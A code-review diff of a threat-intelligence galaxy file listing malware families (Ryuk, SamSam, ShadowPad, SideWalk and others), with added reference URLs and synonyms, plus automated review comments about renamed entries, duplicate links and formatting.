+ "https://community.riskiq.com/article/c88cf7e6",
 "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/CORP_KNOWLEDGEBASE/91000/KB91844/en_US/McAfee%20Labs%20Threat%20Advisory%20-%20Ransom-Ryukv6.pdf",
 "https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/",
 "https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon",
 "https://medium.com/ax1al/reversing-ryuk-eef8ffd55f12",
+ "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf",
 "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html",
 "https://www.clearskysec.com/wp-content/uploads/2021/02/Conti-Ransomware.pdf",
 "https://www.secureworks.com/research/threat-profiles/gold-ulrick",
 "https://cofense.com/the-ryuk-threat-why-bazarbackdoor-matters-most/",
 "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/",
 "https://www.reuters.com/article/usa-healthcare-cyber-idUSKBN27E0EP",
+ "https://www.youtube.com/watch?v=HwfRxjV2wok",
+ "https://www.proofpoint.com/us/blog/threat-insight/q4-2020-threat-report-quarterly-analysis-cybersecurity-trends-tactics-and-themes",
 "https://www.youtube.com/watch?v=CgDtm05qApE",
"https://research.nccgroup.com/2021/03/04/deception-engineering-exploring-the-use-of-windows-service-canaries-against-ransomware/",
 "https://unit42.paloaltonetworks.com/ryuk-ransomware/",
@@ -27172,9 +31052,12 @@
 "https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware",
 "https://storage.pardot.com/652283/16118467480sqebwq7/MSP_Security_Summit___John_Hammond_Huntress___Analyzing_Ryuk.pdf",
 "https://www.bleepingcomputer.com/news/security/new-ryuk-info-stealer-targets-government-and-military-secrets/",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.mandiant.com/resources/fin12-ransomware-intrusion-actor-pursuing-healthcare-targets",
 "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
 "https://twitter.com/SophosLabs/status/1321844306970251265",
 "https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware",
+ "https://4rchib4ld.github.io/blog/NiceToMeetYouRyuk/",
 "https://labs.sentinelone.com/an-inside-look-at-how-ryuk-evolved-its-encryption-and-evasion-techniques/",
 "https://blog.cyberint.com/ryuk-crypto-ransomware",
 "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
@@ -27184,6 +31067,7 @@
 "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html",
 "https://www.crowdstrike.com/blog/wizard-spider-adds-new-feature-to-ryuk-ransomware/",
 "https://www.bleepingcomputer.com/news/security/hacking-group-is-targeting-us-hospitals-with-ryuk-ransomware/",
+ "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/",
 "https://www.latimes.com/local/lanow/la-me-ln-times-delivery-disruption-20181229-story.html",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
 "https://www.bleepingcomputer.com/news/security/french-it-giant-sopra-steria-hit-by-ryuk-ransomware/",
@@ -27193,17 +31077,22 @@
 "https://securityliterate.com/reversing-ryuk-a-technical-analysis-of-ryuk-ransomware/",
 "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2019-ACT-005.pdf",
 "https://twitter.com/IntelAdvanced/status/1356114606780002308",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
 "https://blog.talosintelligence.com/2020/06/CTIR-trends-q3-2020.html#more",
 "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf",
 "https://www.domaintools.com/resources/blog/analyzing-network-infrastructure-as-composite-objects",
+ "https://www.heise.de/ct/artikel/Was-Emotet-anrichtet-und-welche-Lehren-die-Opfer-daraus-ziehen-4665958.html",
+ "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware",
 "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
 "https://krebsonsecurity.com/2020/10/fbi-dhs-hhs-warn-of-imminent-credible-ransomware-threat-against-u-s-hospitals/",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
 "https://decrypt.co/15394/how-ransomware-exploded-in-the-age-of-btc",
 "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/",
 "https://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html",
 "https://www.youtube.com/watch?v=7xxRunBP5XA",
+ "https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6",
 "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://www.heise.de/ct/artikel/Was-Emotet-anrichtet-und-welche-Lehren-die-Opfer-daraus-ziehen-4665958.html",
+ "https://twitter.com/anthomsec/status/1321865315513520128",
 "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html"
 ],
 "synonyms": [],
@@ -27217,17 +31106,21 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk_stealer",
- "https://www.bleepingcomputer.com/news/security/ryuk-related-malware-steals-confidential-military-financial-files/",
- "https://twitter.com/VK_Intel/status/1171782155581689858"
+ "https://www.crowdstrike.com/blog/sidoh-wizard-spiders-mysterious-exfiltration-tool/",
+ "https://analyst1.com/file-assets/Nationstate_ransomware_with_consecutive_endnotes.pdf",
+ "https://twitter.com/VK_Intel/status/1171782155581689858",
+ "https://www.bleepingcomputer.com/news/security/ryuk-related-malware-steals-confidential-military-financial-files/"
+ ],
+ "synonyms": [
+ "Sidoh"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "0f0e5355-1dbf-4af4-aebf-88b08e6272a4",
 "value": "Ryuk Stealer"
 },
 {
- "description": "",
+ "description": "Ransomware.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.sadogo",
@@ -27237,7 +31130,7 @@
 "type": []
 },
 "uuid": "188528f1-1292-4aaa-b1e6-3fe0ab78ff81",
- "value": "Sadogo Ransomware"
+ "value": "Sadogo"
 },
 {
 "description": "",
@@ -27298,6 +31191,19 @@
 "uuid": "08817c1e-3a90-4c9b-b332-52ebe72669c5",
 "value": "SaiGon"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.saint_bot",
+ "https://blog.malwarebytes.com/threat-analysis/2021/04/a-deep-dive-into-saint-bot-downloader/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "aa0afca8-551e-4fc7-a314-f541b80c6833",
+ "value": "Saint Bot"
+ },
 {
 "description": "Sakula / Sakurel is a trojan horse that opens a back door and downloads potentially malicious files onto the compromised computer.",
 "meta": {
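Review bot: The `value` rename in this hunk (`"Sadogo Ransomware"` → `"Sadogo"`), and the parallel renames of Satan, Sekhmet and SepSys in the following hunks, drop the old display name without recording it anywhere in the cluster. The uuid is unchanged so uuid-based relations survive, but MISP galaxy tags are derived from the value string (`misp-galaxy:malpedia="Sadogo Ransomware"`), so events already tagged with the old name will no longer resolve to this cluster after the rename. Adding the previous name to the entry's synonyms, e.g. `"synonyms": ["Sadogo Ransomware"]`, keeps lookups by the old tag working while the shorter name becomes canonical. The same one-line change applies to the Satan, Sekhmet and SepSys entries.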
@@ -27342,7 +31248,10 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.sality",
 "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/sality_peer_to_peer_viral_network.pdf",
- "https://www.botconf.eu/wp-content/uploads/2015/12/OK-P18-Kleissner-Sality.pdf"
+ "https://www.researchgate.net/profile/Lorenzo-De-Carli/publication/320250366_Botnet_protocol_inference_in_the_presence_of_encrypted_traffic/links/5fa9608792851cc286a08592/Botnet-protocol-inference-in-the-presence-of-encrypted-traffic.pdf?origin=publication_detail",
+ "https://unit42.paloaltonetworks.com/c2-traffic/",
+ "https://www.botconf.eu/wp-content/uploads/2015/12/OK-P18-Kleissner-Sality.pdf",
+ "https://gist.githubusercontent.com/quangnh89/41deada8a936a1877a6c6c757ce73800/raw/41f27388a11a606e1d6a7596dcb6469578e79321/sality_extractor.py"
 ],
 "synonyms": [],
 "type": []
@@ -27369,16 +31278,21 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.samsam",
 "https://www.secureworks.com/research/threat-profiles/gold-lowell",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1",
 "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
 "http://blog.talosintel.com/2016/03/samsam-ransomware.html",
 "https://sites.temple.edu/care/ci-rw-attacks/",
 "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
 "https://www.crowdstrike.com/blog/an-in-depth-analysis-of-samsam-ransomware-and-boss-spider/",
+ "https://www.secureworks.com/research/samsam-ransomware-campaigns",
 "https://www.justice.gov/opa/pr/two-iranian-men-indicted-deploying-ransomware-extort-hospitals-municipalities-and-public",
+ "https://www.secureworks.com/blog/ransomware-deployed-by-adversary",
 "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
 "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/samsam-ransomware-chooses-its-targets-carefully-wpna.aspx",
 "https://nakedsecurity.sophos.com/2018/05/01/samsam-ransomware-a-mean-old-dog-with-a-nasty-new-trick-report/",
 "https://www.youtube.com/watch?v=LUxOcpIRxmg",
+ "https://www.secureworks.com/blog/samsam-converting-opportunity-into-profit",
+ "https://www.secureworks.com/blog/samas-ransomware",
 "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
 "http://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html",
 "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/"
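Review bot: The CrowdStrike reference added near the top of the SamSam refs, `https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1`, duplicates the existing `https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/` further down the same array; the two differ only in the trailing slash. Consumers that deduplicate refs by exact string comparison will keep both, so one of the two lines should be dropped before this lands. The refs array for this entry continues past the end of the hunk.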
@@ -27399,9 +31313,7 @@
 "https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html",
 "http://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html"
 ],
- "synonyms": [
- "Daws"
- ],
+ "synonyms": [],
 "type": []
 },
 "uuid": "34c6504b-e947-49d8-a963-62b7594b7ef9",
@@ -27464,7 +31376,7 @@
 "value": "Sasfis"
 },
 {
- "description": "",
+ "description": "Ransomware.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.satan",
@@ -27485,7 +31397,7 @@
 "type": []
 },
 "uuid": "5639f7db-ab70-4b86-8a2f-9c4e3927ba91",
- "value": "Satan Ransomware"
+ "value": "Satan"
 },
 {
 "description": "",
@@ -27637,7 +31549,7 @@
 "https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824",
 "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
 "https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
 "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
 "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
 "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
@@ -27651,6 +31563,7 @@
 "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do",
 "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672",
 "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
 "https://github.com/Tera0017/SDBbot-Unpacker",
 "https://vblocalhost.com/uploads/VB2020-Jung.pdf",
 "https://www.secureworks.com/research/threat-profiles/gold-tahoe"
@@ -27797,20 +31710,24 @@
 "value": "seinup"
 },
 {
- "description": "",
+ "description": "Ransomware.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.sekhmet",
- "https://id-ransomware.blogspot.com/2020/03/sekhmet-ransomware.html",
- "https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis",
+ "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-007/",
 "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf"
+ "https://id-ransomware.blogspot.com/2020/03/sekhmet-ransomware.html",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
+ "https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
+ "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/"
 ],
 "synonyms": [],
 "type": []
 },
 "uuid": "b4b4e8c8-fc66-4618-ba35-75f21d7d6922",
- "value": "Sekhmet Ransomware"
+ "value": "Sekhmet"
 },
 {
 "description": "",
@@ -27827,7 +31744,7 @@
 "value": "SendSafe"
 },
 {
- "description": "",
+ "description": "Ransomware.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.sepsys",
@@ -27839,7 +31756,7 @@
 "type": []
 },
 "uuid": "08f37434-4aba-439f-afae-fed61f411ac4",
- "value": "SepSys Ransomware"
+ "value": "SepSys"
 },
 {
 "description": "",
@@ -27872,12 +31789,14 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.servhelper",
- "https://www.gdatasoftware.com/blog/2020/07/36122-hidden-miners",
+ "https://blog.talosintelligence.com/2021/08/raccoon-and-amadey-install-servhelper.html",
 "https://insights.oem.avira.com/ta505-apt-group-targets-americas/",
 "https://threatrecon.nshc.net/2019/08/29/sectorj04-groups-increased-activity-in-2019/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy/",
+ "https://securitynews.sonicwall.com/xmlpost/servhelper-2-0-enriched-with-bot-capabilities-and-allow-remote-desktop-access/",
 "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
 "https://e.cyberint.com/hubfs/Report%20Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors%20Tools/CyberInt_Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors'%20Tools_Report.pdf",
+ "https://medium.com/walmartglobaltech/ta505-adds-golang-crypter-for-delivering-miners-and-servhelper-af70b26a6e56",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
 "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
 "https://ti.360.net/blog/articles/excel-4.0-macro-utilized-by-ta505-to-target-financial-institutions-recently-en/",
 "https://www.cybereason.com/blog/threat-actor-ta505-targets-financial-enterprises-using-lolbins-and-a-new-backdoor-malware",
@@ -27885,11 +31804,12 @@
 "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/servhelper-evolution-and-new-ta505-campaigns/",
 "https://www.deepinstinct.com/2019/04/02/new-servhelper-variant-employs-excel-4-0-macro-to-drop-signed-payload/",
 "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://securitynews.sonicwall.com/xmlpost/servhelper-2-0-enriched-with-bot-capabilities-and-allow-remote-desktop-access/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy/",
 "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505",
 "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part2/",
- "https://www.secureworks.com/research/threat-profiles/gold-tahoe",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf"
+ "https://www.gdatasoftware.com/blog/2020/07/36122-hidden-miners",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
+ "https://www.secureworks.com/research/threat-profiles/gold-tahoe"
 ],
 "synonyms": [],
 "type": []
@@ -27902,6 +31822,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowhammer",
+ "https://www.trendmicro.com/en_us/research/19/d/analyzing-c-c-runtime-library-code-tampering-in-software-supply-chain-attacks.html",
 "https://countercept.com/blog/analysis-shadowhammer-asus-attack-first-stage-payload/",
 "https://mauronz.github.io/shadowhammer-backdoor",
 "https://www.vkremez.com/2019/03/lets-learn-dissecting-operation.html",
@@ -27931,24 +31852,32 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowpad", - "https://securelist.com/shadowpad-in-corporate-networks/81432/", - "https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/", - "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/", - "https://cdn.securelist.com/files/2017/08/ShadowPad_technical_description_PDF.pdf", - "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf", - "https://securelist.com/apt-trends-report-q2-2020/97937/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage", - "https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/", - "https://securelist.com/apt-trends-report-q3-2020/99204/", - "https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf", + "https://www.youtube.com/watch?v=_fstHQSK-kk", + "https://therecord.media/redecho-group-parks-domains-after-public-exposure/", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan/", + "https://www.recordedfuture.com/redecho-targeting-indian-power-sector/", "https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf", "https://www.youtube.com/watch?v=55kaaMGBARM", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Winnti.pdf", - "https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf", + "https://www.ptsecurity.com/upload/corporate/ru-ru/webinars/ics/winnti-shadowpad.pdf", + "https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/", + 
"https://securelist.com/shadowpad-in-corporate-networks/81432/", + "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/", + "https://cdn.securelist.com/files/2017/08/ShadowPad_technical_description_PDF.pdf", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", - "https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/" + "https://labs.sentinelone.com/shadowpad-a-masterpiece-of-privately-sold-malware-in-chinese-espionage/", + "https://www.trendmicro.com/en_us/research/19/d/analyzing-c-c-runtime-library-code-tampering-in-software-supply-chain-attacks.html", + "https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf", + "https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf", + "https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf", + "https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/", + "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Winnti.pdf", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage" ], "synonyms": [ "POISONPLUG.SHADOW", 
@@ -28001,6 +31930,19 @@
 "uuid": "6f9ed0b0-63c8-4f51-8425-17cfc2b3c12e",
 "value": "shareip"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shark",
+ "https://www.clearskysec.com/wp-content/uploads/2021/08/Siamesekitten.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "d00c8f94-d6b5-40b7-b167-fc546c5dec38",
+ "value": "Shark"
+ },
 {
 "description": "",
 "meta": {
@@ -28022,9 +31964,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpstage",
- "https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign"
+ "https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign",
+ "https://www.0ffset.net/reverse-engineering/malware-analysis/molerats-string-decryption/"
+ ],
+ "synonyms": [
+ "LastConn"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "11788d9b-485b-4049-ba5e-1b06d526361e",
@@ -28061,11 +32006,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.shifu",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
 "http://researchcenter.paloaltonetworks.com/2017/01/unit42-2016-updates-shifu-banking-trojan/",
 "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://securityintelligence.com/shifu-masterful-new-banking-trojan-is-attacking-14-japanese-banks/",
 "https://www.virusbulletin.com/virusbulletin/2015/11/shifu-rise-self-destructive-banking-trojan",
- "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/"
+ "https://securityintelligence.com/shifu-masterful-new-banking-trojan-is-attacking-14-japanese-banks/"
 ],
 "synonyms": [],
 "type": []
@@ -28136,6 +32082,7 @@
 "https://securityintelligence.com/merchant-of-fraud-returns-shylock-polymorphic-financial-malware-infections-on-the-rise/",
 "https://web.archive.org/web/20141016080249/http://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware",
 "https://securityintelligence.com/shylocks-new-trick-evading-malware-researchers/",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
 "https://www.europol.europa.eu/newsroom/news/global-action-targeting-shylock-malware",
 "https://www.virusbulletin.com/virusbulletin/2015/02/paper-pluginer-caphaw"
 ],
@@ -28147,6 +32094,36 @@
 "uuid": "515ee69a-298a-4fcf-bdb0-c5fc6d41872f",
 "value": "Shylock"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sidetwist",
+ "https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "3275503c-1f0a-4f6c-b13b-ec4ca2b29786",
+ "value": "SideTwist"
+ },
+ {
+ "description": "Shellcode-based malware family that according to ESET Research was likely written by the same authors as win.crosswalk. ",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewalk",
+ "https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/",
+ "https://documents.trendmicro.com/assets/white_papers/wp-earth-baku-an-apt-group-targeting-indo-pacific-countries.pdf",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware"
+ ],
+ "synonyms": [
+ "ScrambleCross"
+ ],
+ "type": []
+ },
+ "uuid": "497d1e0f-dd0c-4462-b3e2-fb4a22f8333f",
+ "value": "SideWalk"
+ },
 {
 "description": "",
 "meta": {
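Review bot: The new SideWalk `description` ends with a trailing space inside the string (`...as win.crosswalk. "`) and refers to the related family by its Malpedia identifier `win.crosswalk` rather than by the name that cluster carries in this file. Trimming the whitespace and naming the cluster as it is displayed elsewhere in the galaxy (keeping the Malpedia id in parentheses if the cross-reference is useful) would match the style of the neighbouring hand-written descriptions such as Sakula's. The other entries added in this hunk (SideTwist, and the Shylock ref) look consistent.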
@@ -28157,6 +32134,8 @@
 "https://ti.qianxin.com/blog/articles/the-recent-rattlesnake-apt-organized-attacks-on-neighboring-countries-and-regions/",
 "https://www.secrss.com/articles/26507",
 "https://s.tencent.com/research/report/659.html",
+ "https://otx.alienvault.com/pulse/5fd10760f9afb730d37c4742/",
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewinder",
 "https://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c",
 "https://s.tencent.com/research/report/479.html"
 ],
@@ -28222,6 +32201,7 @@
 "https://github.com/Tera0017/TAFOF-Unpacker",
 "http://www.intezer.com/silenceofthemoles/",
 "https://www.group-ib.com/resources/threat-research/silence.html",
+ "https://www.youtube.com/watch?v=FttiysUZmDw",
 "https://reaqta.com/2019/01/silence-group-targeting-russian-banks/",
 "https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf",
 "https://securelist.com/the-silence/83009/",
@@ -28302,6 +32282,7 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.sinowal",
 "https://www.recordedfuture.com/turla-apt-infrastructure/",
+ "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf",
 "https://www.virusbulletin.com/virusbulletin/2014/06/sinowal-banking-trojan",
 "https://www.symantec.com/security_response/writeup.jsp?docid=2008-010718-3448-99&tabid=2",
 "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
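Review bot: The Malpedia self-reference added to the SideWinder entry, `https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewinder`, is inserted in the middle of the refs array, whereas every other cluster visible in this diff (Royal DNS, RTM, Ryuk Stealer, Saint Bot, Shark, Sinowal, …) lists its Malpedia details URL as the first element. Moving it to the top of the array keeps the ordering convention that lets a reader or a script locate the canonical Malpedia link by position. The refs array for this entry begins before the hunk.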
@@ -28352,6 +32333,20 @@
 "uuid": "6d5e558a-e640-49c3-87b9-2c102c334b1b",
 "value": "Skimer"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.skinnyboy",
+ "https://cybergeeks.tech/skinnyboy-apt28/",
+ "https://cluster25.io/wp-content/uploads/2021/05/2021-05_FancyBear.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "fce8d9c9-7d83-4221-b726-5c49ea271109",
+ "value": "SkinnyBoy"
+ },
 {
 "description": "A Microsoft SQL Server backdoor",
 "meta": {
@@ -28380,7 +32375,9 @@
 "https://blog.telsy.com/following-the-turlas-skipper-over-the-ocean-of-cyber-operations/",
 "https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/"
 ],
- "synonyms": [],
+ "synonyms": [
+ "Kotel"
+ ],
 "type": []
 },
 "uuid": "fac6313b-8068-429c-93ae-21e8072cf667",
@@ -28502,6 +32499,19 @@
 "uuid": "a8561caf-eb9f-4a02-8277-a898a0a259ae",
 "value": "smac"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.smackdown",
+ "https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/raw/master/2013/2013.05.20.Operation_Hangover/Unveiling_an_Indian_Cyberattack_Infrastructure.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "427dcec9-e2b9-44ad-bf58-281b7ba971bb",
+ "value": "Smackdown"
+ },
 {
 "description": "",
 "meta": {
